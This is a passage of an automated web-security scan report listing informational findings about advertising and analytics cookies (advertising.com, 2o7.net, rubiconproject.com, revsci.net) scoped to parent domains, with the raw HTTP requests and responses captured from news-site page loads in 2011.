Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

11.26. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=15702 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=/nsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzA4NzsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:06:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmsacramento.112.2o7.net
Path:	/b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmsacramento/1/H.20.3/s83257504000794?AQB=1&ndh=1&t=3/8/2011%2019%3A48%3A59%206%20300&pageName=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&g=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&r=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&cc=USD&ch=Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&server=blogs.sacbee.com&events=event7&c1=http%3A//blogs.sacbee.com/the_state_worker/&h1=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c3=*Product&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=Sacramento%20Bee%3A%20Moveable%20Type%3A%20Staff%3A%20&v4=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&c5=.threshold&c6=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c13=Unknown&c20=%7CU%3A%20Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker%20%3A%20blogs.sacbee.com&c33=8%3A30PM&c34=Saturday&c39=%20%23navlink%3Dnavdrop&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&c44=Sto%3A%203000px%20%3A%203sc%20%3A%20100%25&c48=YTextAd%3A%20*Product%3Ablogs.sacbee.com%3AProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&pidt=1&oid=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&ot=A&AQE=1 HTTP/1.1
Host: nmsacramento.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:04:36 GMT
Last-Modified: Mon, 05 Sep 2011 01:04:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CEA4-0D28-2AB4C075"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=62294659&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop
xserver: www388
Content-Length: 0
Content-Type: text/plain

11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
udm_0=MLvvNSMJaSpn3g1FoZH0RlrFVGlLZikvZx25PXJmUCGL98grjFJqCCNpB/yeIe8tiuuU7DwV9uJRcKHDIz5sfLNLUI1v7CtFzyMjtMVqchuMirh+fVYDSTx6kYYD35s1jl+stYqc8GsQe73ckgkbu4VWrKeX2B7cZ/1seHrobMMUM7L5reZTF5m4zcGRkreyO0EKX5Wx+FYENxQ5/aj2i3QTfKgHhOu0nW8f+tcshhAFgqgczjwKnptz4DLwfWySzFP5wVwM+5ZURb4Sl1CQqxFIoYHaB2U9bktv+VgMOU1ZBee+imwg7hUw1OM10Z7Em8yut0h38HT+0e404C0cOgQ24hBYw+TwFcPjx+ASIPZ36/rWPXN2lf6nqHyamgPG4SqEkq2WG8fzc0B9GkS0nT8ZVWwOabJvEkykzFF/+8Xxh/nYZE24yORkcXIy5PEin+j+o4l6I1NJAcwDJ8vbDb/MmtGGNaqd4AwDZ2Ijc/ZToTiK4Aukkj/LvsuziPG4IRvM8nf6rJbqLkWwFcaoXY7vUst/Gg7Xa/xavuUFDKvbHfCv+1yPk1dz/PYvygr/Rk6zsIJQ0P6z3IwJM+in9OuPRJ7QjHK7ndiF0mmCNutid8vPaEnygJPqBzs8EBCS1ptxgc9OPXaSPNOKhLwQxDDEpVmulh6B5oui82z2SVApQ+wHGfpaE6FtnRZDJmB4Lu3g88cANQsQfz22xW2pBk3b2fh0eYCd+/SrmquMLKZIXY06i4xZwMRGHhgPLCUALAq30j4PGNG8Lbs9O2o6pNGNryL/rXvzbEoDigpJG/nBFqh5HNOUAogER7G+UaHbFrPGha5Y+7kZW/nX50pKipg1eovzW42n/IOT7s0hqTfUt28mej2z+FtSCUM+L6+DOlRsWrQSt8O1Kq+P9ltbJmQtL5TUx2Lgd+Bs9sQsWdHWq+XJbVGcxXX5x5elPlkKPibM4IAdr0tgvSiBju8YRaVhLjbin/Y11hrducFcz94sD8qVh5g6z0VOhRdx4D6z0K8VoqgdqQaEAPBw5MwfMp8KaH64wOmvQxMYEBvDsc5uANyIHQHbFXbGz51NIVTekUt9BdWxFLyXvli2OK+iH/+O6NeH3pqas2pk/Tu07l/CoXE0ZEV80c/FleVQoq1ZQY3G9OSTCcZMQVECZND0NsMxYGPs0BohuXdlJw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNSMJaSpn3g1FoZH0RlrFVGlLZikvZx25PXJmUCGL98grjFJqCCNpB/yeIe8tiuuU7DwV9uJRcKHDIz5sfLNLUI1v7CtFzyMjtMVqchuMirh+fVYDSTx6kYYD35s1jl+stYqc8GsQe73ckgkbu4VWrKeX2B7cZ/1seHrobMMUM7L5reZTF5m4zcGRkreyO0EKX5Wx+FYENxQ5/aj2i3QTfKgHhOu0nW8f+tcshhAFgqgczjwKnptz4DLwfWySzFP5wVwM+5ZURb4Sl1CQqxFIoYHaB2U9bktv+VgMOU1ZBee+imwg7hUw1OM10Z7Em8yut0h38HT+0e404C0cOgQ24hBYw+TwFcPjx+ASIPZ36/rWPXN2lf6nqHyamgPG4SqEkq2WG8fzc0B9GkS0nT8ZVWwOabJvEkykzFF/+8Xxh/nYZE24yORkcXIy5PEin+j+o4l6I1NJAcwDJ8vbDb/MmtGGNaqd4AwDZ2Ijc/ZToTiK4Aukkj/LvsuziPG4IRvM8nf6rJbqLkWwFcaoXY7vUst/Gg7Xa/xavuUFDKvbHfCv+1yPk1dz/PYvygr/Rk6zsIJQ0P6z3IwJM+in9OuPRJ7QjHK7ndiF0mmCNutid8vPaEnygJPqBzs8EBCS1ptxgc9OPXaSPNOKhLwQxDDEpVmulh6B5oui82z2SVApQ+wHGfpaE6FtnRZDJmB4Lu3g88cANQsQfz22xW2pBk3b2fh0eYCd+/SrmquMLKZIXY06i4xZwMRGHhgPLCUALAq30j4PGNG8Lbs9O2o6pNGNryL/rXvzbEoDigpJG/nBFqh5HNOUAogER7G+UaHbFrPGha5Y+7kZW/nX50pKipg1eovzW42n/IOT7s0hqTfUt28mej2z+FtSCUM+L6+DOlRsWrQSt8O1Kq+P9ltbJmQtL5TUx2Lgd+Bs9sQsWdHWq+XJbVGcxXX5x5elPlkKPibM4IAdr0tgvSiBju8YRaVhLjbin/Y11hrducFcz94sD8qVh5g6z0VOhRdx4D6z0K8VoqgdqQaEAPBw5MwfMp8KaH64wOmvQxMYEBvDsc5uANyIHQHbFXbGz51NIVTekUt9BdWxFLyXvli2OK+iH/+O6NeH3pqas2pk/Tu07l/CoXE0ZEV80c/FleVQoq1ZQY3G9OSTCcZMQVECZND0NsMxYGPs0BohuXdlJw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:52:30 GMT

GIF89a.............!.......,...........D..;

11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
